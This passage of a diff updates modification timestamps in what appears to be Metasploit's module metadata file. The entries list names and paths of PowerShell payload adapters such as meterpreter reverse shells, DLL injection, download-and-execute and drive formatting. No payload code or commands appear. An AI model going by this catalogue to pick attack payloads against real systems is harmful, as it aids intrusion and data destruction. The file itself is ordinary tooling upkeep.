+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp",
@@ -171341,7 +171456,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp",
@@ -171379,7 +171494,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports",
@@ -171418,7 +171533,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns",
@@ -171458,7 +171573,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4",
@@ -171498,7 +171613,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns",
@@ -171536,7 +171651,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid",
@@ -171574,7 +171689,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp",
@@ -171609,7 +171724,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dns_txt_query_exec",
@@ -171644,7 +171759,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/download_exec",
@@ -171680,7 +171795,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/exec",
@@ -171717,7 +171832,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/format_all_drives",
@@ -171755,7 +171870,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/generic/debug_trap",
@@ -171790,7 +171905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/generic/tight_loop",
@@ -171826,7 +171941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/loadlibrary",
@@ -171862,7 +171977,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/messagebox",
@@ -171902,7 +172017,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp",
@@ -171942,7 +172057,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp",
@@ -171981,7 +172096,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp",
@@ -172020,7 +172135,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid",
@@ -172059,7 +172174,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe",
@@ -172098,7 +172213,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp",
@@ -172137,7 +172252,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp",
@@ -172178,7 +172293,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4",
@@ -172217,7 +172332,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid",
@@ -172255,7 +172370,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/find_tag",
@@ -172296,7 +172411,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_hop_http",
@@ -172335,7 +172450,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_http",
@@ -172374,7 +172489,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_http_proxy_pstore",
@@ -172413,7 +172528,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_https",
@@ -172454,7 +172569,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_https_proxy",
@@ -172493,7 +172608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_ipv6_tcp",
@@ -172531,7 +172646,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_named_pipe",
@@ -172570,7 +172685,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_nonx_tcp",
@@ -172609,7 +172724,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_ord_tcp",
@@ -172648,7 +172763,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp",
@@ -172687,7 +172802,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_allports",
@@ -172727,7 +172842,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_dns",
@@ -172768,7 +172883,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4",
@@ -172809,7 +172924,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_rc4_dns",
@@ -172848,7 +172963,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_tcp_uuid",
@@ -172888,7 +173003,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttp",
@@ -172928,7 +173043,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/meterpreter/reverse_winhttps",
@@ -172963,7 +173078,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/metsvc_bind_tcp",
@@ -172998,7 +173113,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/metsvc_reverse_tcp",
@@ -173037,7 +173152,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -173076,7 +173191,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_hidden_tcp",
@@ -173114,7 +173229,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp",
@@ -173153,7 +173268,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_ipv6_tcp_uuid",
@@ -173190,7 +173305,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_named_pipe",
@@ -173227,7 +173342,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_nonx_tcp",
@@ -173265,7 +173380,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp",
@@ -173305,7 +173420,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4",
@@ -173343,7 +173458,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid",
@@ -173379,7 +173494,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag",
@@ -173417,7 +173532,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp",
@@ -173454,7 +173569,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp",
@@ -173491,7 +173606,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp",
@@ -173529,7 +173644,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp",
@@ -173567,7 +173682,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports",
@@ -173606,7 +173721,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns",
@@ -173646,7 +173761,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4",
@@ -173686,7 +173801,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns",
@@ -173724,7 +173839,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid",
@@ -173763,7 +173878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -173802,7 +173917,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp",
@@ -173840,7 +173955,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp",
@@ -173879,7 +173994,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid",
@@ -173916,7 +174031,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe",
@@ -173953,7 +174068,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp",
@@ -173991,7 +174106,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp",
@@ -174031,7 +174146,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4",
@@ -174069,7 +174184,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid",
@@ -174105,7 +174220,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag",
@@ -174143,7 +174258,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp",
@@ -174180,7 +174295,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp",
@@ -174217,7 +174332,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp",
@@ -174255,7 +174370,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp",
@@ -174293,7 +174408,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports",
@@ -174332,7 +174447,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns",
@@ -174372,7 +174487,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4",
@@ -174412,7 +174527,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
